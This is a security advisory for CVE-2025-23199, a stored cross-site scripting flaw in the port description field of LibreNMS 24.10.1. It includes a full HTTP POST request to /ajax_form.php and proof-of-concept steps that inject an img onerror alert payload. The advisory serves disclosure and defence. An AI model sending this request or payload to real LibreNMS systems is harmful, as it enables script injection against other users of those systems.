CVE-2025-23199: LibreNMS Ports Stored Cross-site Scripting vulnerability
(updated )
StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php
-> param: descr
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
of Librenms version 24.10.1 (https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and select the “ports” section.
- In the “Description” field, enter the following payload:
"><img src onerror="alert(1)">
. - Save the changes.
- The XSS vulnerability is triggered when accessing the “ports” tab, and the payload is executed again when hovering over the modified value in the “Port” field.
Payload:
References
Detect and mitigate CVE-2025-23199 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →